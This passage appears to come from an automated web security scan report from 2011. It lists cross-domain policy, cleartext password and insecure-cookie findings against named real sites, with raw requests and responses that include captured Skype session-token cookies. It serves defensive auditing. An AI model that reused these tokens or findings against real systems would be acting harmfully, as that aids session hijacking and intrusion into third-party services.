<allow-access-from domain="*.skype.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skype.test" secure="false" />
...[SNIP]...

4.57. http://share.skype.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://share.skype.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: share.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:04:06 GMT
Server: Apache/2.2.0 (Fedora)
Last-Modified: Mon, 04 May 2009 11:41:38 GMT
ETag: "3d9466-173-46914a5288080"
Accept-Ranges: bytes
Content-Length: 371
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>    
<allow-access-from domain="*.skype.com" />
<allow-access-from domain="*.skype.net" />
<allow-access-from domain="*.skype.test"/>
...[SNIP]...

4.58. http://shop.skype.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: shop.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:08:58 GMT
Server: Apache
Last-Modified: Mon, 15 Feb 2010 12:48:02 GMT
ETag: "36eca8-17c-47fa307142480"
Accept-Ranges: bytes
Content-Length: 380
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>    
<allow-access-from domain="*.skype.com" />
<allow-access-from domain="*.skype.net" />
<allow-access-from domain="*.skype.test" />
...[SNIP]...

4.59. http://www-cdn.dell.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www-cdn.dell.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www-cdn.dell.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 27 Jun 2008 14:53:19 GMT
ETag: "80997c8965d8c81:0"
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
Date: Sun, 04 Sep 2011 16:19:07 GMT
Content-Length: 370
Connection: close
Cache-Control: max-age=0

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.dell.com -->
<cross-domain-policy>
<allow-access-from domain="*.dell.com" />
<allow-access-from domain="*.coltas.com" />
<allow-access-from domain="*.dellpartnerdirect.com" />
...[SNIP]...

4.60. http://www.hp.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:38 GMT
Server: Apache
Last-Modified: Mon, 17 May 2010 11:29:38 GMT
ETag: "486c88a41ec80"
Accept-Ranges: bytes
Content-Length: 213
Cache-Control: max-age=7200
Expires: Sun, 04 Sep 2011 18:19:38 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.hp.com" />
</cross-dom
...[SNIP]...

4.61. http://www.ibm.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ibm.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:17 GMT
Server: IBM_HTTP_Server
Last-Modified: Sat, 01 Nov 2008 20:30:18 GMT
ETag: "153-95044a80"
Accept-Ranges: bytes
Content-Length: 339
epKe-Alive: timeout=10, max=7
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- $Id: crossdomain.xml,v 1.3 2008/08/08 15:47:24 krusch Ex
...[SNIP]...
<allow-access-from domain="*.ibm.com" />
<allow-access-from domain="*.lotus.com" />
...[SNIP]...

4.62. http://www.radware.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.radware.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.radware.com

Response

HTTP/1.1 200 OK
Content-Length: 452
Content-Type: text/xml
Last-Modified: Thu, 16 Jun 2011 20:46:30 GMT
Accept-Ranges: bytes
ETag: "3c6a478662ccc1:417"
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:18:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cooliris.com" />
<allow-access-from domain="*.radware.net" />
<allow-access-from domain="*.radware.com" />
<allow-access-from domain="*.gridserver.com/" />
<allow-access-from domain="*.youtube.com/" />
<allow-access-from domain="*.gregeland.com" />
...[SNIP]...

4.63. http://www.skype.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.skype.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 17:59:14 GMT
Server: Apache
Last-Modified: Thu, 14 Oct 2010 09:18:24 GMT
ETag: "94c00f-1a2-4929031207800"
Accept-Ranges: bytes
Content-Length: 418
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml
Content-Language: en

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>    
<allow-access-from domain="*.skype.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skype.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skype.test" secure="false" />
...[SNIP]...

4.64. http://www.skypeassets.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.skypeassets.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.skypeassets.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 14 Oct 2010 09:18:24 GMT
ETag: "1a2-4929031207800"
Content-Type: application/xml
Content-Language: en
Cache-Control: max-age=10800
Date: Sun, 04 Sep 2011 21:04:12 GMT
Content-Length: 418
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>    
<allow-access-from domain="*.skype.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skype.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skype.test" secure="false" />
...[SNIP]...

4.65. http://www.typepad.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.typepad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.typepad.com

Response

HTTP/1.0 200 OK
Date: Mon, 05 Sep 2011 02:23:14 GMT
Server: Apache
X-Webserver: oak-tp-app013
Cache-Control: private
Pragma: no-cache
Vary: cookie
Content-Length: 401
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="static.typepad.com" />
<allow-
...[SNIP]...
<allow-access-from domain="*.sixapart.com" />
<allow-access-from domain="*.videoegg.com" />
<allow-access-from domain="*.saymedia.com" />
...[SNIP]...

4.66. http://bit.ly/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bit.ly
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bit.ly

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 21:05:35 GMT
Content-Type: text/xml
Content-Length: 278
Last-Modified: Wed, 25 May 2011 20:25:45 GMT
Connection: close
Expires: Tue, 06 Sep 2011 21:05:35 GMT
Cache-Control: max-age=172800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!-- http://bit.ly/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="bit.ly" />
<allow-access-from domain="bitly.net" />
<allow-access-from domain="j.mp" />
<allow-access-from domain="bitly.com" />
...[SNIP]...

4.67. http://cymphonix.app3.hubspot.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cymphonix.app3.hubspot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cymphonix.app3.hubspot.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 21:47:20 GMT
Accept-Ranges: bytes
ETag: "0e4f34a711c81:111b2"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:19:28 GMT
Connection: close

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
- <cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-domain-p
...[SNIP]...

5. Silverlight cross-domain policy  previous  next
There are 8 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://met1.hp.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://met1.hp.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: met1.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:48 GMT
Server: Omniture DC/2.0.0
xserver: www385
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.2. http://metrics.skype.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.skype.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 17:59:13 GMT
Server: Omniture DC/2.0.0
xserver: www285
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.3. http://microsoftsto.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://microsoftsto.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: microsoftsto.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:23:14 GMT
Server: Omniture DC/2.0.0
xserver: www372
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.4. http://nsm.dell.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nsm.dell.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: nsm.dell.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:16 GMT
Server: Omniture DC/2.0.0
xserver: www111
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.5. http://pixel.33across.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:13:42 GMT
Server: Apache
Last-Modified: Fri, 22 Jul 2011 00:03:04 GMT
Accept-Ranges: bytes
Content-Length: 335
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<gr
...[SNIP]...

5.6. http://pixel.quantserve.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 21:13:41 GMT
Content-Type: text/xml
Content-Length: 312
Date: Sun, 04 Sep 2011 21:13:41 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
   <domain uri="*"/>
</allow-from>
<grant-to>
   <resour
...[SNIP]...

5.7. http://js.microsoft.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: js.microsoft.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 12 May 2009 23:10:10 GMT
ETag: "c4640cc56d3c91:0"
Server: Microsoft-IIS/7.5
VTag: 438904743200000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Cache-Control: max-age=900
Date: Mon, 05 Sep 2011 02:23:13 GMT
Content-Length: 572
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from >
<domain uri="http://www.microsoft.com"/>
<domain uri="http://i.microsoft.com"/>
<domain uri="http://i2.microsoft.com"/>
<domain uri="http://i3.microsoft.com"/>
<domain uri="http://i4.microsoft.com"/>
   <domain uri="http://img.microsoft.com"/>
...[SNIP]...

5.8. http://msdn.microsoft.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msdn.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: msdn.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 02:23:10 GMT
Connection: keep-alive
Content-Length: 1456

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://msdn.microsoft.com"/>
<domain uri="http://i.msdn.microsoft.com"/>
<domain uri="http://i2.msdn.microsoft.com"/>
<domain uri="http://i3.msdn.microsoft.com"/>
...[SNIP]...
<domain uri="http://technet.microsoft.com"/>
<domain uri="http://i.technet.microsoft.com"/>
<domain uri="http://i2.technet.microsoft.com"/>
<domain uri="http://i3.technet.microsoft.com"/>
...[SNIP]...
<domain uri="http://expression.microsoft.com"/>
<domain uri="http://i.expression.microsoft.com"/>
<domain uri="http://i2.expression.microsoft.com"/>
<domain uri="http://i3.expression.microsoft.com"/>
...[SNIP]...
<domain uri="http://onlinehelp.microsoft.com"/>
<domain uri="http://i.onlinehelp.microsoft.com"/>
<domain uri="http://i2.onlinehelp.microsoft.com"/>
<domain uri="http://i3.onlinehelp.microsoft.com"/>

<domain uri="http://help.outlook.com"/>
<domain uri="http://i.help.outlook.com"/>
<domain uri="http://i2.help.outlook.com"/>
<domain uri="http://i3.help.outlook.com"/>
...[SNIP]...

6. Cleartext submission of password  previous  next
There are 2 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424053111904900904576549933849920392.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:17:18 GMT
Server: Apache/2.0.64 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep05 - Sun 09/04/11 - 09:07:13 EDT
Cache-Control: max-age=15
Expires: Sun, 04 Sep 2011 16:17:33 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 191170
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<form name="freeRegistration_form" id="freeRegistration_form" action="" method="post" accept-charset="utf-8" onsubmit="return false;">
<ul class="regForms">
...[SNIP]...
</label>
<input type="password" name="passwordReg" value="" id="passwordReg" maxlength='15' class="text" />
</div>
...[SNIP]...
</label>

<input type="password" name="passwordConfirmationReg" value="" id="passwordConfirmationReg" maxlength='15' class="text" />
</div>
...[SNIP]...

6.2. http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424053111904900904576549933849920392.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:17:18 GMT
Server: Apache/2.0.64 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep05 - Sun 09/04/11 - 09:07:13 EDT
Cache-Control: max-age=15
Expires: Sun, 04 Sep 2011 16:17:33 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 191170
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</h4>
<form action="http://commerce.wsj.com/auth/submitlogin" id="login_form" name="login_form" method="post" onsubmit="suppress_popup=true;return true;">
<fieldset>
...[SNIP]...
</label>
<input type="password" name="password" id="login_password" class="login_pswd" tabindex="2" value="" maxlength="30"/>
<input type="hidden" name="url" id="page_url" value=""/>
...[SNIP]...

7. SSL cookie without secure flag set  previous  next
There are 41 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


7.1. https://login.skype.com/account/password-reset-request  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://login.skype.com
Path:   /account/password-reset-request

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/password-reset-request?setlang=en&intsrc=client%7Cforgot-pword HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.skype.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: skype-login=hvd1f0nqsu93kvs6dhba2diop2; skype-session-token=94fd441852b9e1046c98536f973599d688791fc3; SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 18:00:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: skype-session-token=94fd441852b9e1046c98536f973599d688791fc3; path=/; domain=.skype.com
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-2012 18:00:26 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 42065
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...

7.2. https://login.skype.com/password-reset-request  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://login.skype.com
Path:   /password-reset-request

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /password-reset-request?setlang=en&intsrc=client%7Cforgot-pword HTTP/1.1
